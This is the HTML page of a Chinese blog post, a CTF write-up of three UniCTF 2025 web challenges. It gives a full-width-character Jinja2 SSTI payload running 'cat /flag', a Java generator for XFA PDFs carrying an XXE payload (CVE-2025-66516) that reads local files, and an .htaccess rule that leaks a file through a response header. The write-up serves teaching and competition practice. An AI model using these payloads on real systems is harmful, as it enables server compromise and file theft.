<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="Regulus"/><meta name="copyright" content="Regulus"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="UniCTF"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="UniCTF_2025 | Mei的小窝"/><meta name="apple-mobile-web-app-title" content="UniCTF_2025 | Mei的小窝"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="http://example.com/2026/02/11/UniCTF-2025/"/><meta name="description" content="UniCTF_2025又被新神赛吊打了，我怎么这么菜(╥﹏╥) 1.WebGlyphWeaver题目提示：一款名片生成器，可根据用户的输入生成充满个性的名片～ 题目内容就是两个输入框，一个是预览一个是导出我们的输入。 虽然想到了使用全角字符绕过，但是由于没有去观察全角字符是否被转化为了半角字符导致以为没有进行转换   题目注释提示我们使用的是jinja2引擎 根据题目类型也很容易猜出来是SS...">
<meta property="og:type" content="article">
<meta property="og:title" content="UniCTF_2025 | Mei的小窝">
<meta property="og:url" content="http://example.com/2026/02/11/UniCTF-2025/index.html">
<meta property="og:site_name" content="Mei的小窝">
<meta property="og:description" content="UniCTF_2025又被新神赛吊打了，我怎么这么菜(╥﹏╥) 1.WebGlyphWeaver题目提示：一款名片生成器，可根据用户的输入生成充满个性的名片～ 题目内容就是两个输入框，一个是预览一个是导出我们的输入。 虽然想到了使用全角字符绕过，但是由于没有去观察全角字符是否被转化为了半角字符导致以为没有进行转换   题目注释提示我们使用的是jinja2引擎 根据题目类型也很容易猜出来是SS...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2026/02/11/UniCTF-2025/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2026-02-11T11:52:05.000Z">
<meta property="article:modified_time" content="2026-02-28T05:51:48.528Z">
<meta property="article:author" content="Regulus">
<meta property="article:tag" content="UniCTF">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2026/02/11/UniCTF-2025/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>UniCTF_2025 | Mei的小窝</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 7.3.0"></head><body bg-style="none"><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>Mei的小窝</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="sub-menu-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li><li><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></li></ul></div></div><div id="nav-function"><div id="search-btn"><a href="javascript:void(0);" title="搜索" accesskey="s"><img src="/assets/images/svg/uc/uc-search.svg" class="icon noview" alt="Icon"><span>搜索</span></a></div><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">Mei的小窝</a></div><div class="menu-aside-item"><a href="javascript:void(0);"><img src="/assets/images/svg/uc/uc-article.svg" class="icon noview" alt="Icon"><span>文章</span></a><ul class="menu-aside-sub-item"><li><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></li><li><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></li><li><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>标签</span></a></li><li><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></li></ul></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 Mei的小窝 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">UniCTF_2025</h1><div class="post-author"><span>作者: Regulus</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2026-02-11</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2026-02-28</span></div></div><div class="post-read"><div class="post-wordcount"><img src="/assets/images/svg/ta/ta-write.svg" class="icon noview" alt="Icon"><span>总字数: 4.2k字</span></div><div class="post-readtime"><img src="/assets/images/svg/ta/ta-time.svg" class="icon noview" alt="Icon"><span>阅读时长: 14分钟</span></div><div class="post-pageview"><img src="/assets/images/svg/ta/ta-fire.svg" class="icon noview" alt="Icon"><span>访问量: </span><span id="vercount_value_page_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div><div class="post-attribute"><div class="post-categories"><img src="/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/categories/CTF/">CTF</a><a class="post-categories-link" href="/categories/CTF/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/">比赛复盘</a></span></div><div class="post-tags"><img src="/assets/images/svg/ta/ta-tag.svg" class="icon noview" alt="Icon"><span><a class="post-tags-link" href="/tags/UniCTF/" rel="tag">UniCTF</a></span></div></div></div><div class="post markdown" indent="false"><h1 id="UniCTF-2025"><a href="#UniCTF-2025" class="headerlink" title="UniCTF_2025"></a>UniCTF_2025</h1><p>又被新神赛吊打了，我怎么这么菜(╥﹏╥)</p>
<h2 id="1-Web"><a href="#1-Web" class="headerlink" title="1.Web"></a>1.Web</h2><h3 id="GlyphWeaver"><a href="#GlyphWeaver" class="headerlink" title="GlyphWeaver"></a>GlyphWeaver</h3><p>题目提示：一款名片生成器，可根据用户的输入生成充满个性的名片～</p>
<p>题目内容就是两个输入框，一个是预览一个是导出我们的输入。</p>
<p>虽然想到了使用全角字符绕过，但是由于没有去观察全角字符是否被转化为了半角字符导致以为没有进行转换</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211211452698.png" class title="image-20260211211452698">

<p>题目注释提示我们使用的是jinja2引擎</p>
<p>根据题目类型也很容易猜出来是SSTI，尝试了一下发现<code>&#123;&#123;&#125;&#125;</code>和<code>&#123;%%&#125;</code>被过滤了，于是考虑全角字符绕过</p>
<p>我们使用预览功能的时候</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211212754915.png" class title="image-20260211212754915">

<p>其实应该发现虽然没有被解析，但是其实已经将全角字符替换为半角字符了</p>
<p>然后使用下面的导出功能发现需要在下面的输入框中才能被解析</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211212920044.png" class title="image-20260211212920044">

<p>然后我们尝试发现还是有waf过滤了字符，比如下划线，我们可以在预览的时候验证是否被过滤了，但是都可以全角绕过，我们直接用全角下划线就行了</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211213743074.png" class title="image-20260211213743074">

<p>但是除了下划线还有一个被过滤了，我试了一下发现竟然是<code>.read()</code>被过滤了，少一个字符都过了，于是我们也不同<code>[]</code>绕过了，直接全角字符</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">｛｛lipsum.＿＿<span class="built_in">globals</span>＿＿[<span class="string">&#x27;os&#x27;</span>][<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;cat /flag&#x27;</span>)．read()｝｝</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p>拿到flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211214609143.png" class title="image-20260211214609143">

<p>然后这个flag还不能直接复制，源代码里面也没有是以变量的形式保存的，需要到F12里面去找</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260211215016305.png" class title="image-20260211215016305">



<p><strong>非预期解</strong></p>
<p>这个感觉就是出题人的问题了，没有防范好非预期获取参数的时候只对字符串进行了过滤，导致使用json数据中使用列表等没有被过滤的数据类型传递的数据没有被过滤。</p>
<p>后台代码可能类似</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line"><span class="keyword">import</span> unicodedata</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    data = request.get_json()</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># ❌ 漏洞：只处理了字符串，没处理列表/字典</span></span><br><span class="line">    name = data.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 只对字符串进行过滤</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(name, <span class="built_in">str</span>): <span class="comment">#1.有可能进行判断只有是字符串才进行过滤</span></span><br><span class="line">        black_list = [<span class="string">&#x27;&#123;&#123;&#x27;</span>, <span class="string">&#x27;&#125;&#125;&#x27;</span>, <span class="string">&#x27;&#123;%&#x27;</span>, <span class="string">&#x27;%&#125;&#x27;</span>]</span><br><span class="line">        <span class="keyword">for</span> blk <span class="keyword">in</span> black_list:</span><br><span class="line">            <span class="keyword">if</span> blk <span class="keyword">in</span> name:<span class="comment">#2.当in用作判断而不是遍历的时候 name必须是字符串才能被判断</span></span><br><span class="line">                <span class="keyword">return</span> <span class="string">&quot;过滤了!&quot;</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 标准化</span></span><br><span class="line">        name = unicodedata.normalize(<span class="string">&#x27;NFKC&#x27;</span>, name)</span><br><span class="line">        template = <span class="string">f&#x27;&#x27;&#x27;<span class="subst">&#123;name&#125;</span>&#x27;&#x27;&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> render_template_string(template) <span class="comment">#jinja2在模板渲染的时候会尝试将列表元组等数据结构转化为字符串</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># ✅ 非预期：如果 name 是列表/字典，直接渲染！</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        template = <span class="string">f&#x27;&#x27;&#x27;<span class="subst">&#123;name&#125;</span>&#x27;&#x27;&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> render_template_string(template)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>我感觉可能是第二种请况，就是一不小心把列表用if in来判断了，导致in无法处理。</p>
<h3 id="SecureDoc"><a href="#SecureDoc" class="headerlink" title="SecureDoc"></a>SecureDoc</h3><p>25年的CVE题目作为web的签到题，看来还是新神赛，是我不配了。</p>
<p>CVE-2025-66516</p>
<p>如果要说漏洞原理那肯定不属于签到题的范围了，具体请况就是Java的一个组件在解析XFA表单PDF文件的时候，会解析xml表单，导致XXE漏洞</p>
<p>然后题目上传完PDF后会直接将解析xml的结果回显，甚至都不需要我们去反弹shell就可以了。</p>
<p>虽然题目复现简单，但是一开始我还是没有找到是那个CVE漏洞。</p>
<p>我们在IDEA中或者直接使用java环境都可以</p>
<p>依赖</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://repo1.maven.org/maven2/org/apache/pdfbox/pdfbox-app/2.0.30/pdfbox-app-2.0.30.jar</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后创建java文件用于生成XFA表单PDF</p>
<div class="code-container" code-lang="Java"><div class="codebox"><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.pdfbox.cos.COSArray;</span><br><span class="line"><span class="keyword">import</span> org.apache.pdfbox.cos.COSName;</span><br><span class="line"><span class="keyword">import</span> org.apache.pdfbox.cos.COSString;</span><br><span class="line"><span class="keyword">import</span> org.apache.pdfbox.pdmodel.PDDocument;</span><br><span class="line"><span class="keyword">import</span> org.apache.pdfbox.pdmodel.common.PDStream;</span><br><span class="line"><span class="keyword">import</span> org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.nio.charset.StandardCharsets;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CreateProbePdf</span> &#123;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"><span class="keyword">if</span> (args.length &lt; <span class="number">2</span>) &#123;</span><br><span class="line">System.err.println(<span class="string">&quot;Usage: java CreateProbePdf &lt;output.pdf&gt; \&quot;&lt;ENTITY_PAYLOAD&gt;\&quot;&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="type">String</span> <span class="variable">outputFile</span> <span class="operator">=</span> args[<span class="number">0</span>];</span><br><span class="line">  <span class="type">String</span> <span class="variable">entityPayload</span> <span class="operator">=</span> args[<span class="number">1</span>]; </span><br><span class="line">  <span class="type">PDDocument</span> <span class="variable">doc</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PDDocument</span>();</span><br><span class="line">  <span class="type">PDAcroForm</span> <span class="variable">form</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PDAcroForm</span>(doc);</span><br><span class="line">  doc.getDocumentCatalog().setAcroForm(form);</span><br><span class="line"> </span><br><span class="line">  <span class="type">String</span> <span class="variable">xfa</span> <span class="operator">=</span> <span class="string">&quot;&lt;?xml version=\&quot;1.0\&quot;?&gt;\n&quot;</span> +</span><br><span class="line">    <span class="string">&quot;&lt;!DOCTYPE xfa [\n&quot;</span> +</span><br><span class="line">    <span class="string">&quot;  &lt;!ENTITY test SYSTEM \&quot;&quot;</span> + entityPayload + <span class="string">&quot;\&quot;&gt;\n&quot;</span> +</span><br><span class="line">      <span class="string">&quot;]&gt;\n&quot;</span> +</span><br><span class="line">      <span class="string">&quot;&lt;xdp:xdp xmlns:xdp=\&quot;http://ns.adobe.com/xdp/\&quot;&gt;\n&quot;</span> +</span><br><span class="line">        <span class="string">&quot;  &lt;template xmlns=\&quot;http://www.xfa.org/schema/xfa-template/2.8/\&quot;&gt;\n&quot;</span> +</span><br><span class="line">          <span class="string">&quot;    &lt;subform name=\&quot;form1\&quot;&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;      &lt;field name=\&quot;leak\&quot;&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;        &lt;ui&gt;&lt;textEdit/&gt;&lt;/ui&gt;\n&quot;</span> +</span><br><span class="line">          <span class="string">&quot;        &lt;value&gt;&lt;text&gt;&amp;test;&lt;/text&gt;&lt;/value&gt;\n&quot;</span> +  </span><br><span class="line">          <span class="string">&quot;      &lt;/field&gt;\n&quot;</span> +</span><br><span class="line">        <span class="string">&quot;    &lt;/subform&gt;\n&quot;</span> +</span><br><span class="line">      <span class="string">&quot;  &lt;/template&gt;\n&quot;</span> +</span><br><span class="line">      <span class="string">&quot;  &lt;xfa:datasets xmlns:xfa=\&quot;http://www.xfa.org/schema/xfa-data/1.0/\&quot;&gt;\n&quot;</span> +</span><br><span class="line">      <span class="string">&quot;    &lt;xfa:data&gt;&lt;leak&gt;&amp;test;&lt;/leak&gt;&lt;/xfa:data&gt;\n&quot;</span> +  </span><br><span class="line">      <span class="string">&quot;  &lt;/xfa:datasets&gt;\n&quot;</span> +</span><br><span class="line">    <span class="string">&quot;&lt;/xdp:xdp&gt;&quot;</span>;</span><br><span class="line">    <span class="type">byte</span>[] bytes = xfa.getBytes(StandardCharsets.UTF_8);</span><br><span class="line">    <span class="type">PDStream</span> <span class="variable">xfaStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PDStream</span>(doc, <span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(bytes));</span><br><span class="line">    <span class="type">COSArray</span> <span class="variable">xfaArray</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">COSArray</span>();</span><br><span class="line">    xfaArray.add(<span class="keyword">new</span> <span class="title class_">COSString</span>(<span class="string">&quot;config.xml&quot;</span>)); </span><br><span class="line">    xfaArray.add(xfaStream);                  </span><br><span class="line">    form.getCOSObject().setItem(COSName.XFA, xfaArray);</span><br><span class="line">    doc.save(<span class="string">&quot;evil-xfa.pdf&quot;</span>);</span><br><span class="line">    doc.close();</span><br><span class="line">    System.out.println(<span class="string">&quot;YES to evil-xfa.pdf generated&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后编译运行</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac -<span class="built_in">cp</span> pdfbox-app-2.0.30.jar CreateProbePdf.java</span><br><span class="line">java -<span class="built_in">cp</span> <span class="string">&quot;.;pdfbox-app-2.0.30.jar&quot;</span> CreateProbePdf flag.pdf <span class="string">&quot;file:///flag&quot;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>上传PDF后直接拿到flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212124258044.png" class title="image-20260212124258044">





<h3 id="ez-upload"><a href="#ez-upload" class="headerlink" title="ez_upload"></a>ez_upload</h3><p>进阶版的文件上传，之前在看htaccess文件的时候就发现了好像可以搞一些事情，但是一直都没有遇到这种解法的题目，比赛出题还是比较新颖的。</p>
<p>题目直接告诉我们过滤了的字符，然后提示我们php是行不通的，看了一下的确行不通</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260215153130762.png" class title="image-20260215153130762">

<p>只是过滤了字符，没有过滤文件后缀，我们可以上传htaccess文件</p>
<p>expr表达式需要Apache2.4+才能使用</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260215171250464.png" class title="image-20260215171250464">

<p>payload</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">RewriteEngine On</span><br><span class="line">RewriteCond expr &quot;file(&#x27;/flag&#x27;) =~ /(.+)/&quot;</span><br><span class="line">RewriteRule .* - [E=FLAG_CONTENT:%1]</span><br><span class="line">Header set X-Test-Expr &quot;%&#123;FLAG_CONTENT&#125;e&quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>让我们一条条指令来分析</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">RewriteEngine On</span><br><span class="line">#开启重写引擎，不开启RewriteCond和RewriteRule都没用</span><br><span class="line">RewriteCond expr &quot;file(&#x27;/flag&#x27;) =~ /(.+)/&quot;</span><br><span class="line">#通过expr表达式调用file函数读取flag，然后通过=~正则匹配符，正则表达式匹配任意字符一次或多次，捕获组捕获flag。RewritedCond返回true执行RewriteRule</span><br><span class="line">RewriteRule .* - [E=FLAG_CONTENT:%1]</span><br><span class="line">#.*正则匹配所有请求 -表示不修改url 通过[E]设置环境变量 FLAG_CONTENT %1为捕获组捕获了/flag</span><br><span class="line">Header set X-Test-Expr &quot;%&#123;FLAG_CONTENT&#125;e&quot;</span><br><span class="line"># Header指令 set设置响应头，X-Test-Expr为自定义字段 引用环境变量 FLAG_CONTENT（注意后面的 e 表示“环境变量”）</span><br></pre></td></tr></table></figure><div 